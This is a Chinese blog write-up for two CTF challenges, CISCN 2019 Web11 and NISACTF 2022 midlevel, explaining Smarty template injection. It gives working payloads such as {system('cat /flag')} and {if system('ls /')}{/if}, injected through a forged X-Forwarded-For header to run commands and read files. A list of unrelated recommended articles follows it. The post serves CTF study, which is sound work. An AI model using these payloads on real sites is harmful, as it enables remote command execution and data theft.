[CISCN 2019华东南]Web11 和[NISACTF 2022]midlevel

最新推荐文章于 2024-05-10 23:14:19 发布
最新推荐文章于 2024-05-10 23:14:19 发布
阅读量750 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: web刷题 文章标签: php javascript web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Leaf_initial/article/details/130397310

[CISCN 2019华东南]Web11

请添加图片描述

从这个图得到提示,是Smarty 模板注入
先介绍一下Smarty

简介:

Smarty是基于PHP开发的,对于Smarty的SSTI的利用手段与常见的flask的SSTI有很大区别。
了解过Jinjia2模板注入的同学应该知道,jinjia2是基于python的,而Smarty是基于PHP的,所以理解起来还是很容易,我们只需要达到命令执行就可以了。

查看版本:

{$smarty.version}
常用标签
{php}

Smarty支持使用{php}{/php}标签来执行被包裹其中的php指令,最常规的思路自然是先测试该标签。

{php}phpinfo(){/php}

但是这个也是要分版本的,Smarty已经废弃{php}标签。在Smarty 3.1,{php}仅在SmartyBC中可用。

直接输入php命令即可:{system(‘ls /’)}
在这里插入图片描述

{literal} 标签

官方手册这样描述这个标签:

{literal}可以让一个模板区域的字符原样输出。 这经常用于保护页面上的Javascript或css样式表,避免因为Smarty的定界符而错被解析。

使用Javascript语句进行命令之执行,常见的变形语句:

<script language="php">phpinfo();</script>

当然这样的语法,在PHP5里面可以使用,在PHP7里面不可以使用,本地测试一下:
在这里插入图片描述因为{literal}支持javascprit语法,所以我们可以RCE,用法如下:

{literal}
<script language="php">phpinfo();</script>
{/literal}
{if}

{if}标签

官方文档中看到这样的描述:

Smarty的{if}条件判断和PHP的if非常相似,只是增加了一些特性。每个{if}必须有一个配对的{/if},也可以使用{else} 和 {elseif},全部的PHP条件表达式和函数都可以在if内使用,如||*, or, &&, and, is_array(), 等等,如:{if is_array($array)}{/if}*

既然全部的PHP函数都可以使用,那么我们是可以利用此来执行我们的代码

{if phpinfo()}{/if}
{if system('ls')}{/if}

请添加图片描述~~~
111~~
~~

可以看到我们有/api和/xff两个路由,一个变量是IP另一个是XFF,但是由于环境问题,我们不能通过构造IP来进行模板注入,所以我们只能通过伪造XFF来进行注入,利用burp suite来构造payload来查看当前的Smaryt 版本:

X-Forwarded-For:{$smarty.version}

请添加图片描述

回显在右上角的Current IP中,看来是没有过滤什么东西,注意版本号是3.1.30这意味着这道题可能有两种写法:

因为{literal}标签存在于php5的版本,所以这里不太好用(可能是我姿势不对)这里显示是这样的
请添加图片描述

写法一:{php}标签

payload:

{system('ls /')}	  //读取根目录文件
{system('cat /flag')} //读取flag

请添加图片描述

可以查看到flag

写法二:{if}标签

{if system('ls /')}{/if}
{if system('cat /flag')}{/if}

同样可以读取flag

[NISACTF 2022]midlevel

和上题一样。。。。无语

参考文章:
PHP Smarty模版注入

detection proposals综述(What makes for effective detection proposals?)
mingo_敏
07-07 6265
本文地址:http://blog.youkuaiyun.com/shanglianlm/article/details/467863031 介绍(INTRODUCTION)本文主要对最近的 proposal 检测方法做一个总结评价。主要是下面这些方法。 2 Detection Proposal 方法(DETECTION PROPOSAL METHODS)作者将 Detection Proposal 分为两类
Substance Painter:在Substance Painter中进行细节雕刻_2024-07-16_11-37-03.Tex
最新发布
10-23 879
在数字艺术3D建模领域,Substance Painter是一款革命性的软件,它提供了强大的纹理绘制细节雕刻功能。雕刻工具是Substance Painter中用于添加编辑3D模型表面细节的关键工具之一。通过使用这些工具,艺术家可以在模型上创建凹凸、磨损、划痕等效果,使模型看起来更加真实有质感。
BUUCTF之[CISCN2019 华东赛区]Web11 ------ SSTI注入
weixin_44632787的博客
06-23 1595
BUUCTF之[CISCN2019 华东赛区]Web11 知识点 SSTI smarty X-Forwarded-For 题目 于是开始BurpSuite抓包添加X-Forwarded-For:127.0.0.1 emmmmmm其实一开始添加完这个就不知道怎么做了,后来去看了别人的WP有提示SSTIsmarty这两个词。心想,这个不是最近才做过类似的题目嘛。。。哎!我居然没想到! 所以开始尝试一下:X-Forwarded-For:{7*8} 获取当前目录有那些文件:X-Forwarded-F
[NISACTF 2022]midlevel
m0_73612768的博客
01-04 943
Smarty 模板注入;
[CISCN2019 华东赛区]Web11
oubasangdadada的博客
03-02 1896
题目提醒Build With Smarty,猜测应该是smarty ssti,右上角显示了IP,猜测注入点应该再X-Forwarded-For 设置X-Forwarded-For为{7+7},在current ip 处回显14,确实在这里存在ssti 查阅smarty手册,发现{$smarty.version},返回版本信息3.1.30,这里smarty的版本是,${smarty.tem...
[NISACTF 2022]下
qq_62046696的博客
07-30 2888
打开界面看见这种,格式一般都是利用管道符然后进行堆叠注入或者报错注入试一下堆叠注入试了一下被过滤掉了,那就是报错注入喽or被过滤用||代替=被过滤用like代替database里面的as被过滤,通过查询一个不存在的表,通过报错获得表名column被过滤,用无列名注入输出长度限制,mid函数,substr函数t因为as被过滤所以不能使用,database因为aa是错误的表名,sqlsql就是正确的表名,通过报错。...
NISACTF 2022 writeup
热门推荐
st1cky的博客
03-29 3万+
周末两天的比赛 WEB11/12)、PWN(5/6)、Reverse(3/6)、Crypto(3/7)、Misc(8/12) WEB没有AK还是略有遗憾,到后面实在做不动了。 第一次写这么长的WP… WEB checkin <?php error_reporting(0); include "flag.php"; // ‮⁦NISACTF⁩⁦Welcome to if ("jitanglailo" == $_GET[ahahahaha] &‮⁦+!!⁩⁦& "‮⁦ Flag!.
NSSCTF web做题记录
lulu11_20的博客
03-02 1238
接下来,使用两个`foreach`循环遍历`$_POST``$_GET`数组,$$key用于创建与数组键名相同的变量,变量值为数组的值。但是前面并没有设定flag结合foreach循环前面判断语句的含义,这里是要传参一个flag=flag才回回显最终的flag信息,但是这里有对flag的传参进行了限制,但是也只对flag的传参进行了限制也就是说,对于其他变量的传参并没有做任何限制,那么我们可以先将另一个变量的参数设置为flag,再赋值给flag变量作为flag变量的参数$a=flag&flag=$a。
Resume-Manufacturing-Engineer-Midlevel.doc )
07-03
**ERP & MRP:** ERP(企业资源规划)是一种集成的信息管理系统,用于管理协调所有企业资源,如财务、人力资源、生产分销等。MRP(物料需求计划)是ERP的一个组成部分,专门用于处理制造企业的物料计划控制。 **...
BUUCTF刷题之路-ciscn_2019_n_11
qq_30528603的博客
05-27 283
非常简单的逻辑,类似于一个猜数字游戏,猜对了弹出flag,失败了还贴心的告诉你可能值。我们要做的就是修改v2变量的内容,让他等于11.28125。这次我们不需要覆盖返回地址只需要改v2的值就好了。接着我们算一下偏移【rbp-30h-rbp+4h】得到偏移为44个字节。意思就是说我们在44个字节之后填入11.28125覆盖v2的值就能使if语句成立。题目只开启了堆栈不可执行。无非就是不能在栈上执行shellcode无伤大雅。
[CISCN 2019华东]Web11
observer的博客
05-10 522
[CISCN 2019华东]Web11
BUUCTF [CISCN2019 华东赛区] Web11
Senimo
12-23 830
BUUCTF [CISCN2019 华东赛区] Web11 考点: 根据页面提示,应该是一个类似IP查询的网站,根据**XXF(X-Forwarded-For)**判断
[CISCN2019 华东赛区]Web11 wp
m0_55185160的博客
03-25 3129
打开题目看到X-Forwarded-For,便想到利用burpsuite,修改X-Forwarded-For 看到确实有回显,还可以看到Build With Smarty !这时想到在学flask ssti中学习到ssti中也有smarty的ssti。 发现在current ip:56说明存在ssti,在利用7{*comment*}7测试一下是否是smarty 然后就可以利用smarty的ssti方式进行命令执行了 payload:{if system('cat /flag')}{/..
NO.2-29 [CISCN2019 华东赛区]Web11
nigo134的博客
08-03 362
BUUCTF之[CISCN2019 华东赛区]Web11 知识点 SSTI smarty X-Forwarded-For 题目 于是开始BurpSuite抓包添加X-Forwarded-For:127.0.0.1 emmmmmm其实一开始添加完这个就不知道怎么做了,后来去看了别人的WP有提示SSTIsmarty这两个词。心想,这个不是最近才做过类似的题目嘛。。。哎!我居然没想到! 所以开始尝试一下:X-Forwarded-For:{7*8} 获取当前目录有那些文件:X-Forwarded-.
[CISCN2019 华东赛区]Web11 SSTI
m0_64180167的博客
09-19 148
这道SSTI 差点给我渗透的感觉了 全是API 我还想去访问API看看。发现成功了 是受控的 这里我就开始没有思路了。欸 那我们可不可以直接修改参数呢。没有东西 我们看看还有什么提示。于是看了wp 说是ssti。发现这里读取了我们的ip。我们抓包看看是如何做到的。
MontageJS项目结构及部署要点指
提供的文件压缩包名称为"montage-midlevel-training-master",这通常表示该压缩包包含了针对MontageJS中等难度级别的培训材料的完整集合,其中可能包含了课程资料、示例代码可能的配置文件。 六、MontageJS框架的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leafzzz__

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值